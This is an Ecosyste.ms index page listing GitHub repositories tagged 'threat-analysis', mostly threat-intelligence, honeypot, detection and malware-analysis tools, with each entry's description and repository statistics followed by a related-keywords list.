Ecosyste.ms: Repos

An open API service providing repository metadata for many open source software ecosystems.

GitHub topics: threat-analysis

deepfence/ThreatMapper

Open source cloud native security observability platform. Linux, K8s, AWS Fargate and more.

Language: TypeScript - Size: 215 MB - Last synced: 23 days ago - Pushed: 23 days ago - Stars: 4,630 - Forks: 566

InQuest/ThreatIngestor

Extract and aggregate threat intelligence.

Language: Python - Size: 1.65 MB - Last synced: 1 day ago - Pushed: 3 months ago - Stars: 790 - Forks: 133

ecstatic-nobel/OSweep

Don't Just Search OSINT. Sweep It.

Language: Python - Size: 43.5 MB - Last synced: 1 day ago - Pushed: over 3 years ago - Stars: 303 - Forks: 70

tatsuiman/malware-traffic-analysis.net

Download pcap files from http://www.malware-traffic-analysis.net/

Size: 912 MB - Last synced: 1 day ago - Pushed: over 6 years ago - Stars: 69 - Forks: 21

t4d/PhishingKitHunter

Find phishing kits which use your brand/organization's files and image.

Language: Python - Size: 29.3 KB - Last synced: 17 days ago - Pushed: over 5 years ago - Stars: 221 - Forks: 64

cowrie/cowrie

Cowrie SSH/Telnet Honeypot https://cowrie.readthedocs.io

Language: Python - Size: 9.49 MB - Last synced: 27 days ago - Pushed: 29 days ago - Stars: 4,903 - Forks: 846

mishalhossin/DetectXDiscord

This Discord bot is designed to provide file scanning functionality using the VirusTotal API to check for viruses and other malware in attachments uploaded to a Discord channel.

Language: Python - Size: 36.1 KB - Last synced: 17 days ago - Pushed: 12 months ago - Stars: 5 - Forks: 1

CYB3RMX/Qu1cksc0pe

All-in-One malware analysis tool.

Language: YARA - Size: 107 MB - Last synced: about 1 month ago - Pushed: about 1 month ago - Stars: 1,096 - Forks: 163

MISP/MISP

MISP (core software) - Open Source Threat Intelligence and Sharing Platform

Language: PHP - Size: 136 MB - Last synced: about 1 month ago - Pushed: about 1 month ago - Stars: 4,963 - Forks: 1,335

zdhenard42/SOC-Multitool

A powerful and user-friendly browser extension that streamlines investigations for security professionals.

Language: JavaScript - Size: 35.2 KB - Last synced: about 1 month ago - Pushed: 9 months ago - Stars: 308 - Forks: 41

Graylog2/graylog-plugin-threatintel

Graylog Processing Pipeline functions to enrich log messages with IoC information from threat intelligence databases

Language: Java - Size: 1.68 MB - Last synced: 30 days ago - Pushed: 2 months ago - Stars: 145 - Forks: 21

MISP/misp-decaying-models

MISP decaying models

Language: Shell - Size: 7.81 KB - Last synced: about 2 months ago - Pushed: almost 4 years ago - Stars: 9 - Forks: 4

barleybobs/DisTrace

Distrace is a collection of python scripts that are designed to assist in tracking, analysing, and disrupting malware campaigns that utilise Discord for command & control (C2).

Language: Python - Size: 17.6 KB - Last synced: about 2 months ago - Pushed: about 2 months ago - Stars: 2 - Forks: 0

ethansilvas/google-cybersecurity

Projects, notes, and write-ups I have done while completing the Google Cybersecurity Certificate

Language: Jupyter Notebook - Size: 5.13 MB - Last synced: about 2 months ago - Pushed: 7 months ago - Stars: 29 - Forks: 14

AppThreat/threat-db

A graph database for components, vulnerabilities and threats powered by dgraph

Language: Python - Size: 1.26 MB - Last synced: 17 days ago - Pushed: over 1 year ago - Stars: 5 - Forks: 1

CERTCC/Vulnerability-Data-Archive

With the hope that someone finds the data useful, we periodically publish an archive of almost all of the non-sensitive vulnerability information in our vulnerability reports database. See also https://github.com/CERTCC/Vulnerability-Data-Archive-Tools

Size: 70.2 MB - Last synced: 2 months ago - Pushed: almost 4 years ago - Stars: 82 - Forks: 25

reportsmishing/public_code

Bunch of scripts helping to investigate smishing URLs

Language: Python - Size: 9.77 KB - Last synced: 14 days ago - Pushed: 11 months ago - Stars: 1 - Forks: 0

reportsmishing/knowledgebase

Size: 1.41 MB - Last synced: 14 days ago - Pushed: 8 months ago - Stars: 3 - Forks: 0

ethansilvas/security-plus

Notes and practice exam analysis I completed when preparing for my CompTIA Security+ exam

Size: 272 MB - Last synced: about 2 months ago - Pushed: 6 months ago - Stars: 3 - Forks: 0

satan1a/TheRoadOfSO

学习安全运营的记录 | The knowledge base of security operation

Language: HTML - Size: 21.8 MB - Last synced: 2 months ago - Pushed: 9 months ago - Stars: 588 - Forks: 133

CloudDefenseAI/falco_extended_rules

Curating Falco rules with MITRE ATT&CK Matrix

Language: Python - Size: 102 KB - Last synced: 3 months ago - Pushed: 3 months ago - Stars: 62 - Forks: 9

ion-storm/sysmon-config Fork of SwiftOnSecurity/sysmon-config

Advanced Sysmon ATT&CK configuration focusing on Detecting the Most Techniques per Data source in MITRE ATT&CK, Provide Visibility into Forensic Artifact Events for UEBA, Detect Exploitation events with wide CVE Coverage, and Risk Scoring of CVE, UEBA, Forensic, and MITRE ATT&CK Events.

Language: PowerShell - Size: 1.56 MB - Last synced: 3 months ago - Pushed: 6 months ago - Stars: 741 - Forks: 142

TalEliyahu/Threat_Model_Examples

Collection of Threat Models

Size: 70.3 KB - Last synced: 4 months ago - Pushed: almost 2 years ago - Stars: 333 - Forks: 49

curated-intel/Threat-Actor-Profile-Guide

The Threat Actor Profile Guide for CTI Analysts

Size: 645 KB - Last synced: 4 months ago - Pushed: 10 months ago - Stars: 79 - Forks: 11

alvin-tosh/Infosec-and-Hacking-Scripts

🚀 This is a collection of hacking🔥 and pentesting 🧐 scripts to help with enumeration, OSINT, exploitation and post exploitation automated scripts to make hacking easier🌠. Have fun!😎

Language: Python - Size: 9.76 MB - Last synced: 4 months ago - Pushed: 4 months ago - Stars: 117 - Forks: 38

bobby-tablez/IP-Obfuscator

Hide an IP address in scripts using hex/decimal/octal conversions

Language: PowerShell - Size: 185 KB - Last synced: 5 months ago - Pushed: 5 months ago - Stars: 51 - Forks: 9

markmackensen/attack_layer_builder

A Python script to generate MITRE ATT&CK Navigator layers from TTPs

Language: Python - Size: 593 KB - Last synced: about 1 month ago - Pushed: about 1 month ago - Stars: 1 - Forks: 0

R4GN4R0K-SEC/R4GN4R0K-SEC.github.io

**|⚡️💥🏴‍☠️#RAGNAR0K-SEC# 🏴‍☠️💥⚡️|** **|⚡️🌐 #Offensive CyberSec# 🌐⚡️|** ***|⚡️⚔️#CyberHacktivism#⚔️ ⚡️|*** *****|⚡️🏴‍☠️#PenTesting#🏴‍☠️ ⚡️|***** *******|⚡️ 🔎#OSINT#🔍 ⚡️|******* **********|⚡️ #lulz# ⚡️|**********

Size: 12.7 KB - Last synced: 6 months ago - Pushed: 6 months ago - Stars: 0 - Forks: 0

markmackensen/ATTACK-Layer-Builder

A Python script to generate MITRE ATT&CK Navigator layers from TTPs

Language: Python - Size: 493 KB - Last synced: 6 months ago - Pushed: 6 months ago - Stars: 1 - Forks: 0

ecstatic-nobel/Analyst-Arsenal 📦

A toolkit for Security Researchers

Language: Python - Size: 5.86 MB - Last synced: 6 months ago - Pushed: over 4 years ago - Stars: 120 - Forks: 36

Daethyra/OpenDTS 📦

Open Domestic Threat Scanner - LLM Threat-Intelligence

Language: Python - Size: 60 MB - Last synced: 17 days ago - Pushed: 9 months ago - Stars: 2 - Forks: 0

401trg/detections

This repository contains all public indicators identified by 401trg during the course of our investigations. It also includes relevant yara rules and ids signatures to detect these indicators.

Language: Python - Size: 4.37 MB - Last synced: 6 months ago - Pushed: about 3 years ago - Stars: 120 - Forks: 19

izm1chael/threatnote Fork of brianwarehime/threatnote

threatnote | Cyber Threat Intelligence Notebook

Language: JavaScript - Size: 13.3 MB - Last synced: 7 months ago - Pushed: 7 months ago - Stars: 0 - Forks: 0

vrikodar/DiaLog

DiaLog is a powerful Log File Analyzer that can also do passive analysis of malicious IP's Found in web-server Traffic

Language: Python - Size: 4.44 MB - Last synced: 7 months ago - Pushed: over 2 years ago - Stars: 5 - Forks: 0

danieleperera/SocAnalystArsenal 📦

Quick SOC L1 ticket structure

Language: Python - Size: 4.52 MB - Last synced: 7 months ago - Pushed: almost 5 years ago - Stars: 30 - Forks: 13

ancailliau/SynSharp

A C# client for Vertex Synapse

Language: C# - Size: 282 KB - Last synced: 17 days ago - Pushed: 6 months ago - Stars: 2 - Forks: 1

jamesbower/EngagedThreat

The goal of Engaged Threat is to provide honeypot researchers the ability to hold the attention of an attacker or to induce the attacker to participate in some sort of increased activity.

Language: Shell - Size: 11.7 KB - Last synced: 4 months ago - Pushed: about 5 years ago - Stars: 7 - Forks: 1

MojtabaTajik/SecureBox

Safe virtual drive which prevent threats being executed

Language: C# - Size: 206 KB - Last synced: 9 months ago - Pushed: 9 months ago - Stars: 3 - Forks: 2

jackaduma/ThreatReportExtractor

Extracting Attack Behavior from Threat Reports

Language: Python - Size: 21.6 MB - Last synced: 10 months ago - Pushed: about 1 year ago - Stars: 53 - Forks: 13

jackaduma/SecBERT

pretrained BERT model for cyber security text, learned CyberSecurity Knowledge

Language: Python - Size: 490 KB - Last synced: 10 months ago - Pushed: about 1 year ago - Stars: 81 - Forks: 17

cyph3rryx/CyberThreat-Monitor

CyberThreat Monitor (SIEM Lab) with Microsoft Azure is a comprehensive threat monitoring solution built on Azure Sentinel, providing real-time visibility into global cyber threats.

Language: PowerShell - Size: 1.41 MB - Last synced: 7 months ago - Pushed: 7 months ago - Stars: 1 - Forks: 0

0xElshazly/0xElshazly.github.io

Threat Analyst - Incident Response - Digital Forensics - Malware Analysis - Blue Team ~ Blog

Language: JavaScript - Size: 53.3 MB - Last synced: 8 months ago - Pushed: 8 months ago - Stars: 1 - Forks: 0

techathena/veritas

pcap analyser that uses rest api for IP/URL reputation and also for obtaining URL's

Language: Python - Size: 8.44 MB - Last synced: about 2 months ago - Pushed: over 3 years ago - Stars: 2 - Forks: 0

secnnet/AMSI-Scripts

Language: PowerShell - Size: 9.77 KB - Last synced: 7 months ago - Pushed: 7 months ago - Stars: 0 - Forks: 0

sebdufourcq/SOC-Multitool-for-Firefox

A powerful and user-friendly browser extension that streamlines investigations for security professionals.

Language: JavaScript - Size: 12.7 KB - Last synced: 10 months ago - Pushed: 10 months ago - Stars: 0 - Forks: 0

blockboard/ThreatMapper Fork of deepfence/ThreatMapper

Identify vulnerabilities in running containers, images, hosts and repositories

Size: 9.84 MB - Last synced: 10 months ago - Pushed: almost 4 years ago - Stars: 2 - Forks: 2

dc401/py-vthashcheck

A proof of concept AWS Lambda Python 3.7 runtime that takes Amazon S3 objects, evaluates against file magic MIME types, and will check existing SHA256 hashes or upload the file to VirusTotal using an API key. The API key is retrieved using security best practices with AWS Secrets Manager cached to reduce API overhead.

Language: Python - Size: 13.1 MB - Last synced: 23 days ago - Pushed: about 1 year ago - Stars: 1 - Forks: 0

scriptingislife/insight

Insight aids in profiling a host by searching several online services for information about an IP or domain name.

Language: Python - Size: 318 KB - Last synced: 11 months ago - Pushed: over 2 years ago - Stars: 3 - Forks: 0

scriptingislife/Mapper-Server

Map and visualize SSH logins from sensors.

Language: Python - Size: 86.9 KB - Last synced: 11 months ago - Pushed: almost 6 years ago - Stars: 3 - Forks: 2

JacYuan1/Malware-Analysis-Project

Analyze different types of malware with the use of static and dynamic analysis techniques.

Size: 2.87 MB - Last synced: about 1 year ago - Pushed: about 1 year ago - Stars: 1 - Forks: 0

wisepythagoras/honeyshell

An SSH honeypot written entirely in Go.

Language: Go - Size: 154 KB - Last synced: about 2 months ago - Pushed: 3 months ago - Stars: 7 - Forks: 1

Truvis/Suricata_Threat-Hunting-Rules

Collection of Suricata rule sets that I use modified to my environments.

Size: 23.4 KB - Last synced: 12 months ago - Pushed: over 3 years ago - Stars: 27 - Forks: 9

jh00nbr/Phishruffus

Intelligent threat hunter and phishing servers

Language: Python - Size: 8.79 KB - Last synced: about 1 year ago - Pushed: over 5 years ago - Stars: 43 - Forks: 25

Avengers7/ThreatExchange

一个威胁交换平台

Language: Python - Size: 4.88 MB - Last synced: about 1 year ago - Pushed: over 3 years ago - Stars: 4 - Forks: 0

security-union/going-fishing-with-my-raspberry-pi

Size: 1.04 MB - Last synced: about 1 year ago - Pushed: over 3 years ago - Stars: 21 - Forks: 5

ecstatic-nobel/IOC-Report 📦

Generate a report containing IOCs gathered from VirusTotal and Hybrid-Analysis.

Language: Python - Size: 114 KB - Last synced: about 1 year ago - Pushed: about 5 years ago - Stars: 3 - Forks: 4

paulveillard/cybersecurity-threat-detection

An ongoing & curated collection of awesome software best practices and remediation techniques, libraries and frameworks, E-books and videos, Technical guidelines and important resources about Threat Detection & Hunting.

Size: 138 KB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 22 - Forks: 4

trickest/packages

Automated compromise detection of the world's most popular packages

Size: 5.27 MB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 10 - Forks: 2

katahiromz/AmsiScanner

Threat detector for Windows 10

Language: C++ - Size: 58.6 KB - Last synced: 13 days ago - Pushed: about 5 years ago - Stars: 3 - Forks: 1

AzAgarampur/PsForge

Process Hollowing demonstration & explanation

Language: C++ - Size: 382 KB - Last synced: about 1 year ago - Pushed: about 3 years ago - Stars: 25 - Forks: 7

CYB3RMX/C2Data

A database for captured data (malicious files etc.) from command and control servers.

Size: 3.91 KB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 3 - Forks: 0

tsumarios/AMAYARA-Lab

The アマヤラ Lab project provides a ready-to-use Jupyter Lab environment to help out with Android malware analysis using YARA rules.

Language: Jupyter Notebook - Size: 46.9 KB - Last synced: 10 months ago - Pushed: over 1 year ago - Stars: 1 - Forks: 0

xakepnz/STRIKEWRITER

Looks up details on a public IPV4 address against ip-info and blacklist-search sites. Providing a reputation check.

Language: Python - Size: 53.7 KB - Last synced: about 1 year ago - Pushed: over 2 years ago - Stars: 11 - Forks: 3

aishee/Yukio

Script auto generate rules with IOC

Language: Python - Size: 6.84 KB - Last synced: about 1 year ago - Pushed: over 5 years ago - Stars: 2 - Forks: 0

ranguli/ip

ip: (the) i(nternet is) p(robably down)

Language: Python - Size: 4.67 MB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 5 - Forks: 1

alan-analytics/kingstonThreatStudy

Repository for the Kingston University threat study

Language: R - Size: 8.31 MB - Last synced: 8 months ago - Pushed: over 1 year ago - Stars: 1 - Forks: 0

ytisf/Maltego-OTX-Pulses

A set of transformations to for indicators-pulses

Language: Python - Size: 22.5 KB - Last synced: 13 days ago - Pushed: over 4 years ago - Stars: 1 - Forks: 1

west-wind/abuse-insights

To extract the usernames attempted by a compromised host. This information is obtained from Abuse IP DB, reports' comments.

Language: Python - Size: 13.7 KB - Last synced: 7 months ago - Pushed: about 2 years ago - Stars: 1 - Forks: 0

Heimdall-Framework/heimdall-framework

USB threat evaluation framework for Linux

Language: Python - Size: 5.36 MB - Last synced: about 1 year ago - Pushed: over 2 years ago - Stars: 11 - Forks: 0

plushed/threatcalc

Calculate threat levels based on Capability, Opportunity, Intent ratings

Language: Python - Size: 18.8 MB - Last synced: about 1 year ago - Pushed: almost 4 years ago - Stars: 0 - Forks: 0

Heimdall-Framework/heimdall-paper

Size: 1.81 MB - Last synced: about 1 year ago - Pushed: about 4 years ago - Stars: 0 - Forks: 0

Piuliss/manati-docker

This repository contains the Dockerfile of the project ManaTI https://github.com/stratosphereips/Manati

Language: Shell - Size: 5.86 KB - Last synced: about 1 year ago - Pushed: about 6 years ago - Stars: 3 - Forks: 1

ecstatic-nobel/Google-Indicator-Search

Programmatically find relationships between a list of strings using Google.

Language: Python - Size: 5.86 KB - Last synced: about 1 year ago - Pushed: over 4 years ago - Stars: 2 - Forks: 1

MonoidalAttackTrees/Lina

A Haskell EDSL for conducting threat analysis using Attack Trees

Language: Haskell - Size: 75.2 KB - Last synced: about 1 year ago - Pushed: over 5 years ago - Stars: 3 - Forks: 1

jamieres/mz-data-extract

Simple tool that you can use for collect relevant data of Portable Executable (PE) files that can be used for Intel during a line of research related with malware.

Language: Python - Size: 657 KB - Last synced: about 1 year ago - Pushed: almost 7 years ago - Stars: 1 - Forks: 2

Related Keywords
threat-analysis 75 threat-intelligence 43 threat-hunting 27 cybersecurity 24 threatintel 17 python 15 security 15 malware-analysis 12 security-tools 9 osint 8 threat-sharing 7 threat-detection 7 infosec 7 honeypot 6 threat-modeling 5 malware 5 threat-intel 5 threat 5 malware-research 4 ioc 4 linux 4 python3 4 fraud-detection 4 network-security 4 malware-detection 4 cyber-security 4 phishing 4 information-security 4 ssh 4 splunk 3 certificate-transparency 3 fraud-prevention 3 mitre-attack 3 machine-learning 3 pentesting 3 cti 3 windows 3 intelligence 3 dfir 3 misp 3 threat-intelligence-platform 3 incident-response 2 siem 2 webshell 2 graylog 2 browser-extension 2 graylog-plugin 2 scanner 2 opendir 2 defaced 2 penetration-testing 2 paper 2 hacking 2 risk-management 2 cyber 2 virustotal 2 raspberry-pi 2 api 2 amsi 2 whois 2 virustotal-api 2 ttps 2 static-analysis 2 heatmap 2 automation 2 attack-navigator 2 powershell 2 cowrie 2 ransomware 2 webapp 2 yara 2 usb 2 nlp-machine-learning 2 intelligence-gathering 2 indicators-of-compromise 2 vulnerability-scanners 2 nlp 2 vulnerability-detection 2 deeplearning 2 devsecops 2 devops 2 cyber-threat-intelligence 2 cspm 2 soc 2 cnapp 2 cloudsecurity 2 logging 2 attacker 2 blue-team 2 threat-monitor 2 smishing 2 suricata 2 pcap 2 threat-response 2 cert 2 threatcrowd 2 cloud-security 2 static-analysis-tools 1 shodan 1 visualization 1